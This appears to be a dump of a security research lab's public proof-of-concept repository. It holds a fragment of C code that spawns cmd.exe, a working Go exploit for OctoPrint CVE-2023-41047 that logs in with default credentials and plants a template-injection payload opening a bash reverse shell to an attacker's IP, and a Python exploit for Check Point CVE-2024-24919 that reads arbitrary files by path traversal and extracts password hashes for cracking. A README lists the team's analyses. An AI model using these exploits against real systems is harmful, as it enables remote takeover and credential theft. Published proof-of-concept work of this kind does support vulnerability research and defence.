cmd[4096] = { L"cmd.exe" }; 575 | 576 | if (!CreateProcessW(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)) 577 | { 578 | CloseHandle(hWrite); 579 | CloseHandle(hRead); 580 | printf("[!] CreateProcessW Failed![%lx]\n", GetLastError()); 581 | return -2; 582 | } 583 | CloseHandle(hWrite); 584 | 585 | } 586 | -------------------------------------------------------------------------------- /CVE-2023-41047/CVE-2023-41047.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "crypto/tls" 5 | "fmt" 6 | "log" 7 | "net/http" 8 | "net/url" 9 | "os" 10 | "strings" 11 | "sync" 12 | ) 13 | 14 | var ( 15 | PROXYURL = "" 16 | ) 17 | 18 | const CSRFTOKEN = "ImU4ZmY1NDhlZTU1ZGI5M2I2MjA3YmZhYjAxY2QzOWQxOTRiN2Q0YTgi.ZUn0tg.OEMZhA3pw-YZTkm7INGV0FBBjZg" 19 | 20 | func getLoginCookie(uri string) string { 21 | uri += "/api/login" 22 | proxy, _ := url.Parse(PROXYURL) 23 | tr := &http.Transport{ 24 | Proxy: http.ProxyURL(proxy), 25 | TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, 26 | } 27 | client := &http.Client{ 28 | Transport: tr, 29 | } 30 | 31 | data := `{"user":"admin","pass":"admin","remember":false}` 32 | 33 | req, err := http.NewRequest("POST", uri, strings.NewReader(data)) 34 | 35 | if err != nil { 36 | log.Println("Error creating request:", err) 37 | } 38 | 39 | req.Header.Set("Content-Type", "application/json; charset=UTF-8") 40 | //req.Header.Set("X-CSRF-Token", CSRFTOKEN) 41 | //req.Header.Set("Cookie", "csrf_token_P5000="+CSRFTOKEN) 42 | 43 | resp, err := client.Do(req) 44 | 45 | if err != nil { 46 | log.Println("Error making request:", err) 47 | } 48 | 49 | defer resp.Body.Close() 50 | 51 | if resp.StatusCode != http.StatusOK { 52 | log.Printf("HTTP request failed with status code: %d\n", resp.StatusCode) 53 | } 54 | 55 | cookies := resp.Cookies() 56 | if len(cookies) == 0 { 57 | log.Println("No cookies found in the response.") 58 | } 59 | 60 | cookieStr := "" 61 | 62 | for _, cookie := 
range cookies { 63 | if cookie.Name == "session_P5000" { 64 | cookieStr = "csrf_token_P5000= " + CSRFTOKEN + ";" + cookie.Name + "=" + cookie.Value 65 | } 66 | //log.Printf("Name: %s, Value: %s\n", cookie.Name, cookie.Value) 67 | } 68 | 69 | return cookieStr 70 | } 71 | 72 | func setRequest(uri string, cookie string, payload string, types int, wg *sync.WaitGroup) { 73 | defer wg.Done() 74 | if types == 0 { 75 | uri += "/api/settings" 76 | } else if types == 1 { 77 | uri += "/api/connection" 78 | } 79 | 80 | proxy, _ := url.Parse(PROXYURL) 81 | tr := &http.Transport{ 82 | Proxy: http.ProxyURL(proxy), 83 | TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, 84 | } 85 | client := &http.Client{ 86 | Transport: tr, 87 | } 88 | 89 | req, err := http.NewRequest("POST", uri, strings.NewReader(payload)) 90 | 91 | if err != nil { 92 | log.Println("Error creating request:", err) 93 | } 94 | 95 | req.Header.Set("Content-Type", "application/json") 96 | req.Header.Set("X-CSRF-Token", CSRFTOKEN) 97 | req.Header.Set("Cookie", cookie) 98 | 99 | _, err = client.Do(req) 100 | 101 | if err != nil { 102 | log.Println("Error making request:", err) 103 | } 104 | 105 | //defer resp.Body.Close() 106 | 107 | //log.Println(resp.StatusCode) 108 | } 109 | 110 | func main() { 111 | 112 | if len(os.Args) <= 4 { 113 | fmt.Println("Usage: ./CVE-2023-41047 ") 114 | return 115 | } 116 | 117 | uri := os.Args[1] 118 | PROXYURL = os.Args[2] 119 | reverseIP := os.Args[3] 120 | reversePort := os.Args[4] 121 | 122 | cookie := getLoginCookie(uri) 123 | 124 | var wg sync.WaitGroup 125 | wg.Add(1) 126 | 127 | log.Println("[*] Start...") 128 | // Turn on virtual printer 129 | payload := `{"plugins":{"virtual_printer":{"enabled":true}},"temperature":{"profiles":[{"name":"ABS","extruder":210,"bed":100,"chamber":null},{"name":"PLA","extruder":180,"bed":60,"chamber":null}]}}` 130 | go setRequest(uri, cookie, payload, 0, &wg) 131 | log.Println("[+] Step 1 finish...") 132 | // Set evil gcode 133 | payload = 
`{"scripts":{"gcode":{"afterPrinterConnected":"{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__=='catch_warnings' %} {{ c.__init__.__globals__['__builtins__'].eval(\"__import__('os').popen('bash -c \\\"bash -i >&/dev/tcp/` + reverseIP + `/` + reversePort + ` 0>&1\\\"').read()\") }} {% endif %} {% endfor %}"}},"temperature":{"profiles":[{"name":"ABS","extruder":210,"bed":100,"chamber":null},{"name":"PLA","extruder":180,"bed":60,"chamber":null}]}}` 134 | go setRequest(uri, cookie, payload, 0, &wg) 135 | log.Println("[+] Step 2 finish...") 136 | 137 | payload = `{"port":"AUTO","baudrate":0,"printerProfile":"_default","autoconnect":false,"command":"connect"}` 138 | go setRequest(uri, cookie, payload, 1, &wg) 139 | log.Printf("[+] Step 3 reverse: tcp://%s:%s", reverseIP, reversePort) 140 | payload = `{"command":"disconnect"}` 141 | go setRequest(uri, cookie, payload, 1, &wg) 142 | 143 | wg.Wait() 144 | } 145 | -------------------------------------------------------------------------------- /CVE-2024-24919/exp.py: -------------------------------------------------------------------------------- 1 | 2 | import argparse 3 | import requests 4 | from urllib3.exceptions import InsecureRequestWarning 5 | import re 6 | import argparse 7 | 8 | 9 | requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) 10 | 11 | 12 | def parse_bin_data(bin_data): 13 | 14 | internal_password_pattern = re.compile(rb":internal_passw.{3}ord \(([^)]+)\)", re.DOTALL) 15 | internal_password_matches = list(internal_password_pattern.finditer(bin_data)) 16 | results = [] 17 | 18 | for match in internal_password_matches: 19 | internal_password = match.group(1).decode('utf-8', errors='ignore').strip() 20 | 21 | if internal_password: 22 | preceding_text = bin_data[:match.start()] 23 | name_pattern = re.compile(rb":name \(([^)]+)\)", re.DOTALL) 24 | name_matches = list(name_pattern.finditer(preceding_text)) 25 | 26 | if name_matches: 27 | name = 
name_matches[-1].group(1).decode('utf-8', errors='ignore').strip() 28 | 29 | results.append({ 30 | 'name': name, 31 | 'internal_password': internal_password 32 | }) 33 | return results 34 | 35 | def fget(url,filename): 36 | 37 | session = requests.Session() 38 | 39 | rawBody = "/CSHELL/../../../../../../../{}".format(filename) 40 | headers = {"Sec-Ch-Ua":"\"Chromium\";v=\"125\", \"Not.A/Brand\";v=\"24\"","Accept":"*/*","Sec-Ch-Ua-Platform":"\"macOS\"","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36","Referer":"https://192.168.161.110/sslvpnc/Portal/Main","Connection":"keep-alive","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"script","Accept-Encoding":"gzip, deflate, br","Accept-Language":"zh-CN,zh;q=0.9","Sec-Ch-Ua-Mobile":"?0","Sec-Fetch-Mode":"no-cors"} 41 | response = session.get("{}/clients/MyCRL".format(url), data=rawBody, headers=headers,verify=False) 42 | 43 | s_filename = filename.split("/")[-1] 44 | if int(response.status_code)==200: 45 | print('[+] The vulnerability exists, and the file will be saved locally.') 46 | with open(s_filename, 'wb') as file: 47 | file.write(response.content) 48 | if "fwauth.NDB" in filename: 49 | result = parse_bin_data(response.content) 50 | 51 | print("[!] You can use hashcat for brute-forcing.") 52 | print("[!] The type of hash is DES(Unix).") 53 | for entry in result: 54 | print("[+] " + f"Username: {entry['name']}, Password_Hash: {entry['internal_password']}") 55 | else: 56 | print('[!] 
The target is inappropriate.') 57 | exit() 58 | 59 | parser = argparse.ArgumentParser() 60 | 61 | parser.add_argument(dest = "url") 62 | parser.add_argument(dest = "filename") 63 | 64 | args = parser.parse_args() 65 | 66 | 67 | fget(args.url,args.filename) 68 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | --- 2 | ## The PoC/Exploit of some interesting vulnerabilities 3 | ### Author: Vulnerability Research Team of Numen Cyber Labs 4 | --- 5 | 6 | 1. TCP/IP RCE Vulnerability (CVE-2022–34718) PoC Restoration and Analysis 7 | https://medium.com/@numencyberlabs/analysis-and-summary-of-tcp-ip-protocol-remote-code-execution-vulnerability-cve-2022-34718-8fcc28538acf 8 | 9 | 2. CVE-2022–36537 Vulnerability Technical Analysis with Exploit 10 | https://medium.com/@numencyberlabs/cve-2022-36537-vulnerability-technical-analysis-with-exp-667401766746 11 | 12 | 3. CVE-2021-38003:From Leaking TheHole to Chrome Renderer RCE 13 | https://medium.com/numen-cyber-labs/from-leaking-thehole-to-chrome-renderer-rce-183dcb6f3078 14 | 15 | 4. CVE-2022–42889:Text4Shell Vulnerability Technical Analysis 16 | https://medium.com/@numencyberlabs/text4shell-or-act4shell-vulnerability-analysis-a860d141e3e5 17 | 18 | 5. Zero Day Vulnerability: Chromium v8 js engine issue 1303458 — Use After Free in x64 Instruction Optimization Vulnerability Analysis 19 | https://medium.com/bugbountywriteup/zero-day-vulnerability-chromium-v8-js-engine-issue-1303458-use-after-free-in-x64-instruction-e874419436a6 20 | 21 | 6. CVE-2022-3723: based on google's public poc 22 | https://medium.com/@numencyberlabs/use-native-pointer-of-function-to-bypass-the-latest-chrome-v8-sandbox-exp-of-issue1378239-251d9c5b0d14 23 | 24 | 7. 
CVE-2023-41047: OctoPrint Remote Code Execution Vulnerability 25 | 26 | https://medium.com/@numencyberlabs/octoprint-remote-code-execution-vulnerability-7e36372d6c2b 27 | 28 | 8. CVE-2024-24919: Check Point Security Gateways Arbitrary File Read Vulnerability 29 | https://medium.com/@numencyberlabs/cve-2024-24919-check-point-security-gateways-arbitrary-file-read-vulnerability-f33b296be408 30 | --- 31 | ## The Analysis of Web3-related vulnerabilities 32 | ### Discovered by Numen Web3 security products 33 | ### Author: Web3 Security Team of Numen Cyber Labs 34 | --- 35 | 36 | 1. Analysis of the First Critical Vulnerability of Aptos Move VM 37 | https://medium.com/numen-cyber-labs/analysis-of-the-first-critical-0-day-vulnerability-of-aptos-move-vm-8c1fd6c2b98e 38 | 39 | 2. The Story of a High-Risk Vulnerability in Move Reference Safety Verify Module 40 | https://medium.com/numen-cyber-labs/the-story-of-a-high-vulnerability-in-move-reference-safety-verify-module-2340f3d8c642 41 | 42 | --------------------------------------------------------------------------------